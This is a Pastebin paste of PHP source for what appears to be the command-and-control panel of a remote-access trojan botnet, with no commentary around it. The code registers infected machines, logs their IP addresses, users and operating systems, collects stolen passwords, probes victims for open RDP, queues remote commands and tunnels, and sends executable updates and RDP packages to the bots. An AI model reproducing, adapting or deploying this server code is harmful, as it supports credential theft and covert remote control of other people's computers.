Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- error_reporting(0);
- define(XTERM_CFG_DIR,$_SERVER["DOCUMENT_ROOT"]."/_xtcfg2");
- include XTERM_CFG_DIR."/maincfg.php";
- //error_reporting(E_ALL);
- if((empty($_POST["q"]))||(empty($_POST["id"]))) die("main");
- if($_POST["q"]!="l") if((empty($_POST["o"]))||(empty($_POST["v"]))) die("main2");
- $dwQType=$_POST["q"];
- $szID=SQLShield($_POST["id"]);
- $szRATVer=SQLShield($_POST["v"]);
- if($_POST["q"]!="l"){
- $rgVer=explode(":",SQLShield($_POST["o"])); //platf:mj:mn:build:sp-mj:sp-mn:suite:type:bits:csdver
- if(count($rgVer)<10) die("ver");
- }
- //-------------------------
- function BotLog($szText){
- if(!($hFile=fopen(BOTS_LOG,"a+"))) return;
- fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
- fclose($hFile);
- }
- function AccessLog($szText){
- if(!defined("ACCESS_LOG_ENABLED")) return;
- if(!($hFile=fopen(ACCESS_LOG,"a+"))) return;
- fputs($hFile,strftime("%d.%m.%Y %H:%M")." ".$szText."\n");
- fclose($hFile);
- }
- function IsBotExist($szID){
- if(!($r=mysql_query("SELECT * FROM xt2_alive WHERE bid='$szID'"))){
- BotLog("SQL Exist failed: ".mysql_error());
- return NULL;
- }
- if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgRow=$row; else $rgRow=NULL;
- mysql_free_result($r);
- return $rgRow;
- }
- function AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){
- $q="INSERT INTO xt2_alive (bid,ctime,atime,uptime,rip,lip,user,country,lang,os_ver,bot_ver,bflags,tstate) VALUES ";
- $q.="('$szID',NOW(),NOW(),'$dwUptime','$szRIP','$szLIP','$szUser','$szCountry','$szLang','$szOS','$szBotVer','$dwFlags','$szTS')";
- if(mysql_query($q)) return;
- BotLog("SQL Add failed: ($q) ".mysql_error());
- }
- function UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS){
- $q="UPDATE xt2_alive SET atime=NOW(),uptime='$dwUptime',rip='$szRIP',lip='$szLIP',user='$szUser',country='$szCountry',lang='$szLang',os_ver='$szOS',";
- $q.="bot_ver='$szBotVer',bflags=$dwFlags,tstate='$szTS' ";
- $q.="WHERE bid='".$rgRow['bid']."'";
- if(mysql_query($q)) return;
- BotLog("SQL Update failed: ($q) ".mysql_error());
- }
- function UpdateMsg($szID,$szMsg){
- mysql_query("UPDATE xt2_alive SET reply='".strftime("[%d.%m.%Y %H:%M:%S] ")."$szMsg' WHERE bid='$szID'");
- }
- function UpdateLP($rgRow,$szID,$szNewPass){
- if($rgRow){
- $szPassList=$rgRow["passwds"];
- $rgPasswds=explode(';',$szPassList);
- foreach($rgPasswds as $szOldPass) if($szOldPass==$szNewPass) return;
- }else $szPassList="";
- $szPassList.="$szNewPass;";
- $rgRow["passwds"]=$szPassList;
- mysql_query("UPDATE xt2_alive SET passwds='$szPassList' WHERE bid='$szID'");
- }
- function SendFile($szFile,$szCmd,$dwUPID,$fDel=false){
- if(!file_exists($szFile)) return "No such file $szFile";
- $dwSize=filesize($szFile);
- if(!($hFile=fopen($szFile,"r"))) return "Can't open $szFile";
- header("Cache-control: private");
- header("Content-Type: application/octet-stream");
- header("Content-Length: ".($dwSize+5+1+1+8)); //+ <WEB>+X
- header("Content-Disposition: attachment; filename=\"".mktime().".exe\"");
- if((strlen($dwUPID)==8)&&($dwUPID=="smss_fix")) echo sprintf("%s%s",$szCmd,$dwUPID); else echo sprintf("%s%08X",$szCmd,($dwUPID+0));
- fpassthru($hFile);
- fclose($hFile);
- if($fDel) unlink($szFile);
- AccessLog($_SERVER["REMOTE_ADDR"]." Sent $szFile");
- die;
- }
- function UpdateVersion($szBotVer){
- if(!($r=mysql_query("SELECT * FROM xt2_cfg"))) return NULL;
- $rgCfg=array();
- while(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgCfg[$row["name"]]=$row["val"];
- mysql_free_result($r);
- $dwBotVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$szBotVer);
- $dwCurrentVer=0+preg_replace("/(\d)\.(\d)\.(\d+).*/","$1$2$3",$rgCfg["current_xt_ver"]);
- if(($dwBotVer>100)&&($dwCurrentVer>100)&&($dwBotVer>=$dwCurrentVer)) return NULL;
- if($szBotVer==$rgCfg["current_xt_ver"]) return NULL;
- if((!strchr($rgCfg["update_file"],"/"))&&(!strchr($rgCfg["update_file"],"\\"))) $rgCfg["update_file"]=UPDATE_DIR.$rgCfg["update_file"];
- return SendFile($rgCfg["update_file"],"U",$rgCfg["update_id"],false);
- }
- function CustomUpload($szBotID){
- if(!($r=mysql_query("SELECT * FROM xt2_cfg WHERE name like 'upl_%' AND val like '$szBotID:%' LIMIT 1"))) return NULL;
- if(($row=mysql_fetch_array($r,MYSQL_ASSOC))) $rgUpl=explode(':',$row["val"]); else $rgUpl=NULL;
- mysql_free_result($r);
- if(!$rgUpl) return NULL;
- mysql_query("DELETE FROM xt2_cfg WHERE id=".$row["id"]);
- return SendFile(UPDATE_DIR.$rgUpl[2],"U",$rgUpl[1],true);
- }
- function CheckMSRDP($szIP){
- if(!($hSock=fsockopen($szIP,3389,&$err,&$strerr,10))) return FALSE;
- fclose($hSock);
- return TRUE;
- }
- function Alive($szID,$rgVer,$szCountry,$szLang,$dwUptime,$szBotVer,$szLIP,$szUser,$szMsg,$szTS){
- $szRIP=$_SERVER["REMOTE_ADDR"];
- $dwFlags=0;
- $szOS=implode(":",$rgVer);
- //Check RDP
- if(!empty($szLIP)){
- if(($szLIP==$_SERVER["REMOTE_ADDR"])&&($szTS=="OK")) if(CheckMSRDP($_SERVER["REMOTE_ADDR"])) $dwFlags|=0x00000001;
- }else if(CheckMSRDP()) $dwFlags|=0x00000001;
- SQLConnect();
- if(!($rgRow=IsBotExist($szID))) AddBot($szID,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
- else UpdateBot($rgRow,$dwUptime,$szRIP,$szLIP,$szUser,$szCountry,$szLang,$szOS,$szBotVer,$dwFlags,$szTS);
- if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
- //LP
- for($i=0;$i<12;$i++) if(!empty($_POST["lp$i"])) UpdateLP($rgRow,$szID,SQLShield($_POST["lp$i"])); else break;
- //--Reply--
- echo "<WEB>+";
- if($rgRow){
- if(!empty($rgRow["send_cmd"])) echo $rgRow["send_cmd"];
- if(($rgTun=IsTunnelSet($rgRow["send_tun"]))) echo "T".$rgTun[0].":".$rgTun[4].":".$rgTun[5].";";
- mysql_query("UPDATE xt2_alive SET send_tun=NULL,send_cmd=NULL WHERE bid='$szID'");
- }
- //Check update,dies on update
- if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s");
- if(($s=CustomUpload($szID))) BotLog("[L] $s");
- if($_POST["smss"]=="fix"){
- if(($s=SendFile(CABS_DIR."smss.fix","U","smss_fix",FALSE))) BotLog("[F] $s");
- }
- die;
- }
- function SendPack($szID,$rgVer,$szBotVer,$szMsg){
- $szOS=implode(":",$rgVer);
- SQLConnect();
- if(!($rgRow=IsBotExist($szID))) AddBot($szID,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,"");
- else UpdateBot($rgRow,0,$_SERVER["REMOTE_ADDR"],"","","","",$szOS,$szBotVer,0,"");
- if(!empty($szMsg)) UpdateMsg($szID,$szMsg);
- echo "<WEB>+";
- if(($s=UpdateVersion($szBotVer))) BotLog("[U] $s");
- if(($s=CustomUpload($szID))) BotLog("[L] $s");
- switch($rgVer[1]){
- case "4":
- case "5":
- if($rgVer[2]=="0"){ //2000
- $szPack=CABS_DIR."5.0-2.32.cab";
- }else if($rgVer[2]=="2"){ //5.2
- if($rgVer[7]!=1){ //2003
- if($rgVer[8]==64) $szPack=CABS_DIR."5.2.64-s.cab"; else $szPack=CABS_DIR."5.0-2.32.cab";
- }else $szPack=CABS_DIR."5.2.64-c.cab";
- }else{ //5.1
- if($rgVer[4]=="3") $szPack=CABS_DIR."5.1.32-s3.cab"; else $szPack=CABS_DIR."5.1.32.cab";
- }
- break;
- case "6":
- if($rgVer[8]==64) $szPack=CABS_DIR."6.x.64.cab"; else $szPack=CABS_DIR."6.x.32.cab";
- break;
- default:
- BotLog("[C] Unknown version of $szID ($szOS): $r");
- die("X");
- break;
- }
- $r=SendFile($szPack,"R",0,false);
- BotLog("[C] File not found $szPack for $szID ($szOS): $r");
- die("X");
- }
- //-------------------------
- switch($dwQType){
- case "i": //Get RDP pack
- AccessLog($_SERVER["REMOTE_ADDR"]." Pack file request: ".implode('|',$_POST));
- SendPack($szID,$rgVer,$szRATVer,SQLShield($_POST["msg"]));
- break;
- case "a": //Alive
- $szLIP=SQLShield($_POST["lip"]);
- $szTS=SQLShield($_POST["ts"]);
- if((empty($_POST["l"]))||(empty($_POST["c"]))||(!isset($_POST["t"]))) die;
- AccessLog($_SERVER["REMOTE_ADDR"]." Alive ".implode('|',$_POST));
- Alive($szID,$rgVer,SQLShield($_POST["c"]),SQLShield($_POST["l"]),SQLShield($_POST["t"]),$szRATVer,$szLIP,SQLShield($_POST["u"]),SQLShield($_POST["msg"]),$szTS);
- break;
- case "l": //DebugLog
- if(!isset($_FILES["f0"])) die;
- AccessLog($_SERVER["REMOTE_ADDR"]." Log from $szID");
- $rgFile=$_FILES["f0"];
- if(!move_uploaded_file($rgFile["tmp_name"],XTERM_CFG_DIR."/logs/_debug-$szID.".sprintf("%08X",mktime()).".log")) die;
- mysql_query("UPDATE xt2_alive SET send_cmd=NULL WHERE bid='".$szID."'");
- die("ok");
- break;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement